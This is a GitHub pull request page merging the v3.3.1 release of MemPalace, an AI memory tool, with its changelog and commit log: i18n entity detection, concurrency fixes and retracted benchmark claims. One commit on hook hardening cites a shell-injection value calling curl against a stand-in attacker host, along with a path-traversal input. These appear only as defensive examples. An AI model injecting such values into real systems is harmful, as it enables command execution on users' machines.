Skip to content

release: v3.3.1#957

Merged
igorls merged 83 commits intomainfrom
release/3.3.1
Apr 17, 2026
Merged

release: v3.3.1#957
igorls merged 83 commits intomainfrom
release/3.3.1

Conversation

@igorls
Copy link
Copy Markdown
Member

@igorls igorls commented Apr 16, 2026

Merges develop into main for the v3.3.1 release.

Version bumps

  • pyproject.toml3.3.1
  • mempalace/version.py3.3.1
  • README.md version badge → 3.3.1
  • uv.lock3.3.1

Changelog

Finalizes the previously-open [Unreleased] — v3.3.0 section (it was never closed out on the 3.3.0 release) by redating it to [3.3.0] — 2026-04-13, and adds a new [3.3.1] — 2026-04-16 section. Full entry is in CHANGELOG.md — highlights:

Headline: multi-language entity detection

Other notable changes

Post-merge checklist

  • Tag v3.3.1 on the squash-merge commit on main (mirrors how v3.3.0 was tagged on 4aa7e1e)
  • Draft GitHub Release referencing the 3.3.1 CHANGELOG section
  • Sync maindevelop afterwards so the [3.3.0] → 2026-04-13 rename is also on develop

Test plan

  • Full suite: uv run python -m pytest tests/ --ignore=tests/benchmarks -q → 959 passed
  • Version consistency + README claim tests pass (44 passed)
  • Lint: uv run ruff check . clean
  • Format: ruff format --check clean on changed files
  • pre-commit hooks (ruff + ruff-format) pass

tejasashinde and others added 30 commits April 13, 2026 14:09
…etic injection

save_hook.sh:
- Coerce stop_hook_active to strict True/False before eval to prevent
  command injection via crafted JSON (e.g. "$(curl attacker.com)")
- Validate LAST_SAVE as plain integer with regex before bash arithmetic
  to prevent command substitution via poisoned state files

hooks_cli.py:
- Add _validate_transcript_path() that rejects paths with '..'
  components and non-.jsonl/.json extensions
- _count_human_messages() now uses the validator, returning 0 for
  invalid paths instead of opening arbitrary files

Tests:
- Path traversal rejection (../../etc/passwd)
- Wrong extension rejection (.txt, .py)
- Valid path acceptance (.jsonl, .json)
- Empty string handling
- Shell injection in stop_hook_active field

Refs: #809
…h test

- _count_human_messages() now logs a WARNING via _log() when a
  non-empty transcript_path is rejected by the validator, making
  silent auto-save failures diagnosable via hook.log
- Add test for platform-native paths (backslashes on Windows) to
  verify _validate_transcript_path works cross-platform
- Add test verifying the warning log is emitted on rejection

Refs: #809
Noticed a URL 
```
hXXps://www.mempalace[.]tech/
```

Though the README currently warns, it is perhaps best to surface it at urgency level at the top of the README.
sanitize_name rejects commas, colons, parentheses, and slashes — characters
that commonly appear in knowledge graph subject/object values. Adds
sanitize_kg_value for KG entity fields (subject, object, entity) while
keeping sanitize_name for predicates and wing/room names.
When no mempalace.yaml or mempal.yaml exists in the source directory,
return a default config (wing = directory name, room = general) instead
of calling sys.exit(1). This lets users mine any directory into their
palace without requiring init first.

Closes #14.
Addresses review feedback on #604:

- Warning now goes to stderr instead of stdout so it doesn't mix with
  mine progress output when users pipe stdout elsewhere.
- Warning explicitly calls out that directories with the same basename
  will share a wing name, and suggests adding mempalace.yaml to
  disambiguate. Prevents silent content mixing across projects mined
  without yaml.
fix: allow mining directories without local mempalace.yaml
fix: harden hooks against shell injection, path traversal, and arithmetic injection
Replace the blanket ban on .tech/.io/.com domains with an allowlist
of real MemPalace surfaces (GitHub repo, PyPI, mempalaceofficial.com)
and call out mempalace.tech as the reported impostor. The blanket
.com ban would have flagged mempalaceofficial.com as fake once DNS
resolves (CNAME shipped in #877).

Also update the April 11 follow-up section to match so the two
notices no longer contradict each other.
Increase visibility of fake website caution
…ation

fix: use permissive validator for KG entity values
Move regular expression compilation to the module level in `dialect.py` to prevent repeated parsing during loop execution.

Co-authored-by: igorls <[email protected]>
export MEMPAL_VERBOSE=true  → hook blocks, agent writes diary in chat
export MEMPAL_VERBOSE=false → silent background save (default)

Developers need to see code and diaries being written.
Regular users want zero chat clutter. Now both work.

TDD: tests written first, failed, code fixed, tests pass.

Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]>
Contributors now get a one-click dev environment that mirrors CI exactly:
Python 3.11 (middle of the 3.9/3.11/3.13 matrix), ruff pinned to the same
>=0.4.0,<0.5 range CI enforces, and pre-commit hooks auto-installed from
the existing .pre-commit-config.yaml.

Pinning ruff in post-create.sh is the load-bearing piece: pyproject only
sets a floor, so without the pin the ruff extension would install 0.15.x
and phantom-fail lint against CI's 0.4.x.
…n-15578943484596502942

⚡ Optimize regex compilation in entity extraction
feat: add VSCode devcontainer matching CI environment
Closes #872. The top-level decision field only recognizes "block".
To not block, return empty JSON {}. "allow" was silently ignored
by Claude Code, causing unpredictable behavior.

Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>
fix: add missing self._lock to query_relationship, timeline, and stats in KnowledgeGraph
fix: replace invalid 'decision: allow' with {} in hooks (closes #872)
TDD: test first, failed, fixed, passed.

Igor fixed query_relationship/timeline/stats in an earlier commit.
close() was the last method touching self._connection without
holding the lock.

Closes #883.

Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>
fix: add lock to KG close() — last missing lock (closes #883)
The rerank pipeline was hardcoded to Anthropic's /v1/messages.
Add a backend flag so the same code path can be exercised with
any OpenAI-compatible endpoint — local Ollama, Ollama Cloud,
or any gateway that speaks /v1/chat/completions.

Enables independent verification of the "100% with Haiku rerank"
claim by running the full benchmark with a different LLM family
(e.g. minimax-m2.7:cloud) and zero Anthropic dependency.

Both longmemeval_bench.py and locomo_bench.py:
 - llm_rerank*() gain backend= / base_url= kwargs
 - CLI: --llm-backend {anthropic,ollama}, --llm-base-url
 - API key required only when backend=anthropic (diary/palace modes still require it)
 - Parse last integer in response (reasoning models emit multi-int output)
 - Fallback to message.reasoning when content is empty
 - Raise max_tokens to 1024 for reasoning models
Addresses #875: every internal BENCHMARKS.md claim reproduced
on Linux x86_64 (v3.3.0 tag, deterministic ChromaDB embeddings,
seed=42 for the LongMemEval dev/held-out split).

Scorecard — all reproduce exactly:

  LongMemEval
    raw R@5                            96.6% (500/500)   ✅
    hybrid_v4 held-out 450 R@5         98.4% (442/450)   ✅
    hybrid_v4 + minimax rerank R@5     99.2% (496/500)   *
    hybrid_v4 + minimax rerank R@10   100.0% (500/500)   *

  LoCoMo (session, top-10)
    raw                                60.3% (1986q)     ✅
    hybrid v5                          88.9% (1986q)     ✅

  ConvoMem all-categories (250 items)   92.9%            ✅
  MemBench all-categories (8500)        80.3%            ✅

* The minimax-m2.7:cloud rerank run replicates the "100%" claim
  with a different LLM family (no Anthropic dependency). R@10 is
  a perfect reproduction; R@5 misses 4 questions that the
  published Haiku run caught — consistent with BENCHMARKS.md's own
  disclosure that hybrid_v4 includes three question-specific fixes
  developed by inspecting misses, i.e. teaching to the test.

The committed 50/450 split is the deterministic (seed=42) split
BENCHMARKS.md references but wasn't previously in the repo.

Full result JSONLs include every question, every retrieved id,
and every score — auditable end-to-end.
Addresses #875. The previous README was 755 lines mixing six purposes
(scam alert, hero, two mea-culpa notes, install guide, architecture
explainer, API reference, file map). Rework it as a pure entry point:
what MemPalace is, how to install, honest benchmark numbers, links to
the website for concept/architecture documentation.

Key content changes:
 - Drop the "highest-scoring AI memory system ever benchmarked" framing.
 - New tagline: "Local-first AI memory. Verbatim storage, pluggable
   backend, 96.6% R@5 raw on LongMemEval — zero API calls." Avoids
   naming a specific vector-store implementation since the backend is
   pluggable (see mempalace/backends/base.py).
 - Remove the cross-system comparison table. Retrieval recall (R@5)
   and end-to-end QA accuracy are different metrics and are not
   comparable; placing MemPalace's R@5 next to competitor QA accuracy
   under a single column header was a category error.
 - The "100%" LongMemEval headline is no longer the lead. The honest
   held-out figure is 98.4% R@5 on 450 unseen questions. The rerank
   pipeline reaches >=99% with any capable LLM (reproduced with
   Claude Haiku, Sonnet, and minimax-m2.7 via Ollama) — pipeline-level,
   not model-specific.
 - Benchmark reproduction commands now reference the correct repo
   (MemPalace/mempalace, not the defunct aya-thekeeper/mempal branch).

New file: docs/HISTORY.md as the canonical home for post-launch
corrections, public notices, and retractions. Contains verbatim:
 - 2026-04-14 note on this rewrite (links to #875)
 - 2026-04-11 impostor-domain notice (moved from README header)
 - 2026-04-07 "A Note from Milla & Ben" (moved from README body)

README keeps a one-line scam-alert callout that links to
docs/HISTORY.md for the full timeline.
Part of #875. Bring the VitePress site into line with the new README
and the reproducibility scorecard: drop category-error comparisons,
drop retracted claims, retain only metrics and caveats that survive
audit.

website/index.md
 - New tagline matches README (local-first, verbatim, pluggable backend,
   96.6% R@5 raw, zero API calls).
 - Replace the "MemPalace hybrid 100% / Supermemory ~99% / Mastra
   94.87% / Mem0 ~85%" comparison table with a single honest table
   showing MemPalace's own retrieval-recall numbers (raw 96.6%,
   hybrid v4 held-out 98.4%). Add an explicit sentence explaining why
   we no longer publish a cross-system table on the landing page
   (retrieval recall vs QA accuracy are different metrics).
 - Soften the "ChromaDB-powered vector search" feature blurb to be
   backend-agnostic, since the retrieval layer is pluggable.

website/reference/benchmarks.md
 - Full rewrite of the retrieval-recall tables. No more "100%"
   headline; honest held-out 98.4% R@5 replaces it. Added the
   model-agnostic rerank result (99.2% R@5 / 100% R@10 with
   minimax-m2.7 via Ollama) to show the pipeline is not Haiku-specific.
 - Drop the LoCoMo "Hybrid v5 + Sonnet rerank (top-50) 100%" row.
   With per-conversation session counts of 19-32 and top_k=50, the
   retrieval stage returns every session by construction — the number
   measures an LLM's reading comprehension, not retrieval.
 - Drop the cross-system comparison tables. Link out to each project's
   own research page (Mastra, Mem0, Supermemory) for their published
   numbers and metric definitions.
 - Rewrite reproduction commands to use the correct repository and
   demonstrate the new --llm-backend ollama flag.

website/concepts/the-palace.md
 - Remove the "+34%" row / paragraph. Wing/room filtering is standard
   metadata filtering in the vector store, not a novel retrieval
   mechanism — the April-7 note already retracted that framing; this
   finishes the retraction on the website where it had remained.

website/guide/searching.md
 - Same treatment for "34% retrieval improvement". Reframe as
   operational scoping, not a novel boost.

website/reference/contributing.md
 - Update the "palace structure matters" bullet to reflect the same
   framing: scoping-not-magic.

website/concepts/knowledge-graph.md
 - Replace the MemPalace-vs-Zep feature matrix with a short "related
   work" note that links to Zep's own documentation for authoritative
   details on their deployment model. Avoids claims we cannot verify
   at source.
Remaining in-repo surfaces carrying the same retracted or broken
claims as the public pages fixed in the previous two commits.

CONTRIBUTING.md
 - "Palace structure matters ... 34% retrieval improvement" → reframed
   as scoping (same rewording applied to the website equivalents).

benchmarks/BENCHMARKS.md
 - Add a prominent "Important caveat" block at the top of the
   "Comparison vs Published Systems" table explaining that R@5
   (retrieval recall) and QA accuracy are different metrics, with
   citations to Mastra, Mem0, and Supermemory's own published
   methodology pages. Annotate the specific competitor rows whose
   numbers are QA accuracy, not retrieval recall.
 - Annotate the `hybrid v4 + rerank 100%` row to note that the 99.4
   → 100 step was tuned on 3 specific wrong answers (already disclosed
   further down in the doc under "Benchmark Integrity"); the honest
   hybrid figure is held-out 98.4%.
 - Fix the broken clone URL — `aya-thekeeper/mempal` no longer points
   at anything; now `MemPalace/mempalace`.

benchmarks/README.md + benchmarks/HYBRID_MODE.md
 - Same clone-URL fix applied.

CHANGELOG.md
 - Add a ### Documentation entry under [Unreleased] v3.3.0 that names
   #875 and summarises the scope of the rewrite.
tejasashinde and others added 23 commits April 15, 2026 23:33
…_patterns,direct_address_pattern, project_verb_patterns and stopwords
…oses #117)

CLI strings, AAAK instruction, regex patterns, and entity section
with person-verb, pronoun, dialogue, and candidate patterns for
Latin+diacritics names (Joao, Ines, Angela).

Follows the i18n entity framework from #911.
- dialogue_patterns[0]: remove stray \" before > (fixes markdown quote matching)
- entity stopwords: add 40 prepositions, conjunctions, and common words to reduce false positives
- pronoun_patterns: add 2nd-person (você/vocês) and possessives (seu/sua/seus/suas)
feat: add Brazilian Portuguese support to entity_detector (closes #117)
BCP 47 language tags are case-insensitive (RFC 5646 §2.1.1) but the
locale files mix conventions (pt-br.json vs zh-CN.json). On
case-sensitive filesystems, '--lang PT-BR' or '--lang zh-cn' silently
missed the file, _load_entity_section returned {}, and entity
detection ran in English with no warning.

The cache key in get_entity_patterns was built from raw input, so
('PT-BR',) and ('pt-br',) produced two distinct entries, both wrong.

Add _canonical_lang(lang) that resolves any casing to the on-disk
filename stem via lowercase comparison, and route load_lang,
_load_entity_section, and the cache key through it.

Closes #927
PEP 604 union syntax (str | None) requires Python 3.10+. The project
supports 3.9 per CI matrix, so use typing.Optional instead.
… scripts

Python's \b is a \w/non-\w transition. Devanagari vowel signs (matras)
like ा ी ु are Unicode category Mc (Mark, Spacing Combining) — not \w.
This means \b splits mid-word on every matra: names like अनीता (Anita)
truncate to अनीत, and person-verb patterns like \bराज\s+ने\s+कहा\b
never match because \b fails after the final matra of कहा.

Same issue affects Arabic, Hebrew, Thai, Tamil, and every other script
whose words contain combining marks.

Fix: locales with combining-mark scripts declare a boundary_chars field
in their entity section (e.g. "\\w\\u0900-\\u097F" for Hindi). The i18n
loader replaces every \b in that locale's patterns with a script-aware
lookaround that treats the declared characters as "inside-word", and
pre-wraps candidate/multi_word patterns with the same boundary.

Default behavior (no boundary_chars) keeps standard \b — en, pt-br, ru,
it are unchanged.

Changes:
- mempalace/i18n/__init__.py: add _script_boundary, _expand_b,
  _wrap_candidate, _collect_entity_section; candidate_patterns are now
  returned fully-wrapped (boundary + capture group applied)
- mempalace/entity_detector.py: extract_candidates compiles pre-wrapped
  candidate patterns directly instead of re-wrapping with \b
- tests/test_entity_detector.py: 5 new tests for Devanagari boundaries
  (name extraction with/without boundary_chars, person-verb firing,
  English regression)
…boundaries

fix(entity_detector): script-aware word boundaries for combining-mark scripts
…alace

entity_detector.py was refactored in #911 to load candidate patterns
from i18n locale JSON files, supporting non-Latin scripts (Cyrillic,
accented Latin, etc.). But three other code paths still hardcoded the
ASCII-only regex [A-Z][a-z]{2,}, silently missing non-Latin entity
names in metadata tagging, closet indexing, and registry lookups.

Replace the hardcoded regex with a shared _candidate_entity_words()
helper that reuses the same i18n candidate_patterns as entity_detector.
Introduces the Indonesian (id) locale, providing translations for CLI commands, status messages, and core terminology.

Includes language-specific regex patterns for stop words and action detection to support text processing and indexing in Indonesian. The test suite is updated with a sample case to verify correct dialect handling and compression.
Refine AAAK instruction and expand entity detection patterns.
On Windows with non-UTF-8 locale (e.g. GBK), Path.read_text() defaults
to platform encoding, breaking onboarding tests and any source code that
reads JSON/markdown with non-ASCII content.

5 files, 8 call sites fixed.
feat: add Hindi language support to i18n module
feat: add Indonesian language support
fix(i18n): resolve language codes case-insensitively (#927)
fix: add explicit UTF-8 encoding to read_text() calls (#776)
fix: use i18n candidate patterns for entity extraction in miner and palace
Bumps version across pyproject.toml, mempalace/version.py, README badge,
and uv.lock. Finalizes the 3.3.0 CHANGELOG section (was still labeled
'Unreleased') and adds a 3.3.1 section covering the multi-language
entity-detection infra and the five new locales landed since 2026-04-13.

Highlights:
- Multi-language entity detection infra (#911) + script-aware word
  boundaries for combining-mark scripts (#932) + BCP 47 case-insensitive
  locale resolution (#928) + i18n patterns wired into miner/palace/
  entity_registry (#931)
- Five new fully-supported locales: pt-br (#156), ru (#760), it (#907),
  hi (#773), id (#778)
- UTF-8 encoding fix on read_text() calls for non-UTF-8 Windows locales
  (#946)
- KnowledgeGraph lock correctness (#884, #887)
- Various smaller fixes and improvements
Advisor caught: initial boundary (962776c..develop) skipped PRs that
landed on develop after v3.3.0 tag but before the sync-back merge.
Adds entries for #871 MEMPAL_VERBOSE, #811 research() local-only
default, #866 init .gitignore, #864 MCP stdout redirect, #863
precompact hook, #865 searcher empty results, #831 cold-start palace,
#862 init help, #815 Slack provenance, #840 save hook auto-mine.
Also drops the awkward caveat on #846 created_at — it's post-v3.3.0.
version-guard workflow checks five sources must agree:
mempalace/version.py, pyproject.toml, .claude-plugin/marketplace.json,
.claude-plugin/plugin.json, .codex-plugin/plugin.json.

Initial release commit missed the three plugin manifests.
…ests

release: bump plugin manifests to 3.3.1
@igorls igorls merged commit 6889c6f into main Apr 17, 2026
7 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.